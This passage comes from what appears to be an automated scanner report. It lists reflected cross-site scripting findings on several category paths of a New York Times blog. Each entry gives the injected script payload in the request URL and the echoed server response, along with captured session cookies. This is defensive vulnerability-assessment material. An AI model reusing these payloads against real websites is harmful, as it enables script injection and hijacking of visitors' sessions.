Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/stanley-fishb14fb\"><script>alert(1)</script>a43a7c90828&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.220. http://opinionator.blogs.nytimes.com/category/stanley-fish/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/stanley-fish/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2254d"><script>alert(1)</script>86219aafb61 was submitted in the REST URL parameter 2. This input was echoed as 2254d\"><script>alert(1)</script>86219aafb61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/stanley-fish2254d"><script>alert(1)</script>86219aafb61/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/stanley-fish2254d\"><script>alert(1)</script>86219aafb61&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.221. http://opinionator.blogs.nytimes.com/category/stanley-fish/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/stanley-fish/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3748b"><script>alert(1)</script>bc108e0983b was submitted in the REST URL parameter 3. This input was echoed as 3748b\"><script>alert(1)</script>bc108e0983b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/stanley-fish/feed3748b"><script>alert(1)</script>bc108e0983b/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:14:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/stanley-fish/feed3748b\"><script>alert(1)</script>bc108e0983b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.222. http://opinionator.blogs.nytimes.com/category/stanley-fish/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/stanley-fish/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e00ad"><script>alert(1)</script>30e8e361bb3 was submitted in the REST URL parameter 3. This input was echoed as e00ad\"><script>alert(1)</script>30e8e361bb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/stanley-fish/pagee00ad"><script>alert(1)</script>30e8e361bb3/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/stanley-fish/pagee00ad\"><script>alert(1)</script>30e8e361bb3/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.223. http://opinionator.blogs.nytimes.com/category/the-conversation [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-conversation

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34517"><script>alert(1)</script>ed0f3f7275b was submitted in the REST URL parameter 2. This input was echoed as 34517\"><script>alert(1)</script>ed0f3f7275b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-conversation34517"><script>alert(1)</script>ed0f3f7275b HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-conversation34517\"><script>alert(1)</script>ed0f3f7275b&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.224. http://opinionator.blogs.nytimes.com/category/the-conversation/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-conversation/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c546"><script>alert(1)</script>e08b7a6164f was submitted in the REST URL parameter 2. This input was echoed as 3c546\"><script>alert(1)</script>e08b7a6164f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-conversation3c546"><script>alert(1)</script>e08b7a6164f/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:14:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-conversation3c546\"><script>alert(1)</script>e08b7a6164f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.225. http://opinionator.blogs.nytimes.com/category/the-conversation/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-conversation/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85eb8"><script>alert(1)</script>aa8d466ec7f was submitted in the REST URL parameter 3. This input was echoed as 85eb8\"><script>alert(1)</script>aa8d466ec7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-conversation/feed85eb8"><script>alert(1)</script>aa8d466ec7f/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:12:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:12:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-conversation/feed85eb8\"><script>alert(1)</script>aa8d466ec7f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.226. http://opinionator.blogs.nytimes.com/category/the-conversation/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-conversation/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e164"><script>alert(1)</script>15a91c4e22f was submitted in the REST URL parameter 3. This input was echoed as 9e164\"><script>alert(1)</script>15a91c4e22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-conversation/page9e164"><script>alert(1)</script>15a91c4e22f/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:16:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:16:19 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-conversation/page9e164\"><script>alert(1)</script>15a91c4e22f/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.227. http://opinionator.blogs.nytimes.com/category/the-score [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-score

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc441"><script>alert(1)</script>452e1e08d7c was submitted in the REST URL parameter 2. This input was echoed as cc441\"><script>alert(1)</script>452e1e08d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-scorecc441"><script>alert(1)</script>452e1e08d7c HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:30:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:30:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-scorecc441\"><script>alert(1)</script>452e1e08d7c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.228. http://opinionator.blogs.nytimes.com/category/the-score/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/the-score/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b124"><script>alert(1)</script>3ea01d75cdf was submitted in the REST URL parameter 3. This input was echoed as 1b124\"><script>alert(1)</script>3ea01d75cdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/the-score/feed1b124"><script>alert(1)</script>3ea01d75cdf/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/the-score/feed1b124\"><script>alert(1)</script>3ea01d75cdf&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.229. http://opinionator.blogs.nytimes.com/category/the-score/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
